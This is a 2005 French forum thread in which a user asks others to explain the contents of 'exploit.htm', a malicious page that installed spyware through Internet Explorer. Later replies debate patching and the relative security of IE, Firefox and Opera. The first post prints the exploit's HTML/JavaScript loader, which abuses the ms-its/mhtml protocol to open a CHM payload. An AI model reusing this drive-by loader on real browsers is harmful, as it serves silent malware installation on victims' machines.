porte ouvert aux virus via javascript.

porte ouvert aux virus via javascript. - HTML/CSS - Programmation

Marsh Posté le 23-04-2005 à 17:49:48    

bonjour.  :hello:  
y'a un baille de ça je m'étais chopé un chayykré virus.  :wahoo:  
Je visitais un page comme une autre (non en fait warez mais faut pas dire  :non: ) et IE s'affole.
Je sentais ça presence, il était là, omnipresent... il me suivait, le spyware, il guettait. euheummm.
donc docteur NORTON il a lancé sa popup d'alerte comme quoi un mechant tantait de s'introduire dans mon nordinateur.
J'ai lancé un scan y'apatrouvé NORTON mais il m'a indiqué la localisation du dit "fichier dangereux chaipaskoi" --> exploit.htm
Et ce salaud de fichier HTM, je sais pas comment il a fait mais il a reussi a telecharger des programmes sur mon disque dur.  [:aloy] mon processeur tournait comme un malade, disque dur qui fait un bruit effroyable, bref on sentait bien qu'il était en train de download un bon petit pâckage de spyware et autres conneries.
Comme j'avais pas envie de me prendre la tête à re'scanner, traquer les fichiers douteux, et comme l'idée d'un formatage me trottait déjà dans la tête je l'ai laissé faire et par curiosité (tant qu'à faire après tout) je voulais voir ce qu'il contenait le fichier HTM...
 

Code :
  1. <textarea id="code" style="display:none;">
  2. <object
  3. data="&#109;s-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm"
  4. type="text/x-scriptlet"></object>
  5. </textarea>
  6. <script language="javascript">
  7. document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,location.href.indexOf(exploit.htm'))));
  8. </script>


 
A l'époque je l'avais imprimé, je m'étais dit quand progressant j'essaierai de comprendre comment marche la bestiole et aujourd'hui je vous le soummet parceque le JS me tente pas assez et que j'aborde en ce moment plus le PHP.  :jap:  
 
donc voilà, qqn serait-il abilité à interpreter ces petites lignes de code vicieux?
 
A+
plus d'infos à propos du contexte, demandez moi.
 
merci

Reply

Marsh Posté le 23-04-2005 à 17:49:48   

Reply

Marsh Posté le 23-04-2005 à 21:10:53    

Une jolie petite crasse, on dirait :D
 
Cette page semble pertinente.
 
Un conseil : Applique REGULIEREMENT les patches dispos pour ton OS!


---------------
Now Playing: {SYNTAX ERROR AT LINE 1210}
Reply

Marsh Posté le 23-04-2005 à 21:12:11    

et pas utilise IE aussi peut etre? [:pingouino]


---------------
IVG en france
Reply

Marsh Posté le 23-04-2005 à 21:18:18    

uriel a écrit :

et pas utilise IE aussi peut etre? [:pingouino]


 http://img96.exs.cx/img96/3373/trsfixe7ns.png


---------------
Stick a parrot in a Call of Duty lobby, and you're gonna get a racist parrot. — Cody
Reply

Marsh Posté le 23-04-2005 à 21:36:10    

Non, faut arrêter de conseiller ça systématiquement. Je l'attendais. :D
 
Tout d'abord, parce que le jour où tout le monde utilisera FF, les failles de FF seront exploitées à fond. Et nous, l'éL1t3, on sera de la revue. :o
 
Ensuite, parce qu'avec un IE patché correctement, tu t'en sors pas trop mal.
 
Faut arrêter de croire que FF et cie vont d'office te permettre de surfer sans risque (cf faille récente sur 1.0.2 accès mémoire).
 
C'est avant tout une façon de surfer intelligente, avec des settings adéquats, et certainement certains sites à éviter- c'est comme en ville, y'a des quartiers chauds.


Message édité par sircam le 23-04-2005 à 21:37:11

---------------
Now Playing: {SYNTAX ERROR AT LINE 1210}
Reply

Marsh Posté le 23-04-2005 à 21:38:06    

sircam a écrit :

Tout d'abord, parce que le jour où tout le monde utilisera FF, les failles de FF seront exploitées à fond. Et nous, l'éL1t3, on sera de la revue. :o


Qui a parlé de Firefox? [:itm]


---------------
Stick a parrot in a Call of Duty lobby, and you're gonna get a racist parrot. — Cody
Reply

Marsh Posté le 23-04-2005 à 21:39:41    

masklinn a écrit :

Qui a parlé de Firefox? [:itm]


C'était à titre exemplatif, bien entendu. D'où le "FF et cie" par après [:itm]


Message édité par sircam le 23-04-2005 à 21:39:53

---------------
Now Playing: {SYNTAX ERROR AT LINE 1210}
Reply

Marsh Posté le 23-04-2005 à 22:57:58    

oui oui yé sait.  :) ça fait longtemps que je surf avec ff maintenant.  :sol:  
je vais lire la page que vous m'avez indiqué.  :jap:

Reply

Marsh Posté le 24-04-2005 à 01:09:19    

IE SP2 et le tour est joué...

Reply

Marsh Posté le 24-04-2005 à 13:47:28    

sircam a écrit :


Faut arrêter de croire que FF et cie vont d'office te permettre de surfer sans risque


ah non, j'ai aussi un OS d'31it3 pour me proteger [:kbchris]


---------------
IVG en france
Reply

Marsh Posté le 24-04-2005 à 13:47:28   

Reply

Marsh Posté le 24-04-2005 à 13:52:11    

sircam a écrit :

Non, faut arrêter de conseiller ça systématiquement. Je l'attendais. :D


 
Pourtant, ici en Allemagne dans les administrations, ils ont interdiction d'utiliser IE. [:petrus75] (ça remonte à 6 mois déjà) et pareil pour plein d'entreprises.
 

Citation :

C'est avant tout une façon de surfer intelligente, avec des settings adéquats, et certainement certains sites à éviter- c'est comme en ville, y'a des quartiers chauds.


 
Alors là, je suis CAREMENT pas d'accord. Un bon navigateur permet d'aller partout. C'est quoi ces histoires de restriction ??  :??:


---------------
Expert en expertises
Reply

Marsh Posté le 24-04-2005 à 16:26:49    

Heu, c'est quoi IE ?
Moi j'ai SP2, suis-je protégé ?

Reply

Marsh Posté le 24-04-2005 à 17:46:42    

Hermes le Messager a écrit :

Alors là, je suis CAREMENT pas d'accord. Un bon navigateur permet d'aller partout. C'est quoi ces histoires de restriction ??  :??:


Tu confonds la théorie, le monde tel qu'il devrait l'être, et la réalité.
 
Il est évident que TOUS les principaux navigateurs présentent des failles. Il est également entendu que seules les failles du navigateur le plus répandu sont principalement exploitées. Et par qui, à ton avis ? Par des sites peu recommandables - c'est étrange, perso, je ne tombe jamais dessus, je pourrais facilement utiliser IE5 sans patch.
 
"Un bon navigateur permet d'aller partout." -> ça n'existe sans doute pas, ou alors c'est simplement un navigateur peu répandu, dont les failles ne sont pas exploitées.


---------------
Now Playing: {SYNTAX ERROR AT LINE 1210}
Reply

Marsh Posté le 24-04-2005 à 17:46:56    

Paracetamol a écrit :

Heu, c'est quoi IE ?
Moi j'ai SP2, suis-je protégé ?


[:kiki]


---------------
Now Playing: {SYNTAX ERROR AT LINE 1210}
Reply

Marsh Posté le 24-04-2005 à 17:58:42    

sircam a écrit :

Tu confonds la théorie, le monde tel qu'il devrait l'être, et la réalité.
 
Il est évident que TOUS les principaux navigateurs présentent des failles. Il est également entendu que seules les failles du navigateur le plus répandu sont principalement exploitées. Et par qui, à ton avis ? Par des sites peu recommandables - c'est étrange, perso, je ne tombe jamais dessus, je pourrais facilement utiliser IE5 sans patch.
 
"Un bon navigateur permet d'aller partout." -> ça n'existe sans doute pas, ou alors c'est simplement un navigateur peu répandu, dont les failles ne sont pas exploitées.


 
Ben écoute, si tu enlèves les activex, tu enlèves 80% des failles déjà... Ensuite, les failles concernant le JS dans IE sont GROSSIERES. Le problème d'IE, c'est qu'il est bcp trop intégré au système. Même si firefox avait 99% de part de marché, il y aurait sans doute des failles, mais 1) Elles sont connues aussitôt, 2) les mises à jour pour ces failles sont très rapides. RIEN A VOIR avec IE pour moi.
 
Ensuite, ya pas que FF non plus. Opera est également un très bon navigateur.


---------------
Expert en expertises
Reply

Marsh Posté le 24-04-2005 à 18:14:33    

Hermes le Messager a écrit :

Ben écoute, si tu enlèves les activex, tu enlèves 80% des failles déjà... Ensuite, les failles concernant le JS dans IE sont GROSSIERES. Le problème d'IE, c'est qu'il est bcp trop intégré au système. Même si firefox avait 99% de part de marché, il y aurait sans doute des failles, mais 1) Elles sont connues aussitôt, 2) les mises à jour pour ces failles sont très rapides. RIEN A VOIR avec IE pour moi.
 
Ensuite, ya pas que FF non plus. Opera est également un très bon navigateur.


En partie vrai. IE cumule le défaut d'être à la fois le plus répandu et le plus vulnérable.
 
Mais pas tt à fait d'accord pour FF, qui m'a récemment déçu, avec cette faille qui permettait de lire des zones de mémoire. C'est énorme, et aucun patch urgent n'a été publié. Il a fallu attendre 1.0.3 pour boucher le trou. Je ne leur jete pas la pierre, FF reste mon préféré, mais ça leur a valu une publication Secunia et cela prouve que contrairement au Pape, il n'est pas infaillible.
 
Pas de comparaison possible avec IE bien sûr, mais perso, je joue plutôt sur le fait que FF n'est encore qu'un challenger et que ces failles sont moins exploitées, plutôt que sur sa sécurité intrinsèque, par ailleurs nettement meilleure mais pas non plus exempte de failles.
 
En tout état de cause, j'évite de naviguer à vue sur des sites louches, où ça sent mauvais l'exploit à chaque coin de page, ce qui limite déjà très fortement les risques, même avec IE.
 
N'oublie pas que nous sommes l'3l1t3, et que l'utilisateur lambda moyen surfe sur le web avec une passoire boursouflée par les trojans et les virus, IE ou pas (mais surtout IE). L'éducation et le comportement sont encore déterminants, malheureusement; la technique seule ne suffit pas (encore).
 
Mon propos n'a d'autre but que de relativiser la rengaine "suffit de ne pas utiliser IE". C'est un bon début, mais ce n'est qu'une partie du problème.


---------------
Now Playing: {SYNTAX ERROR AT LINE 1210}
Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed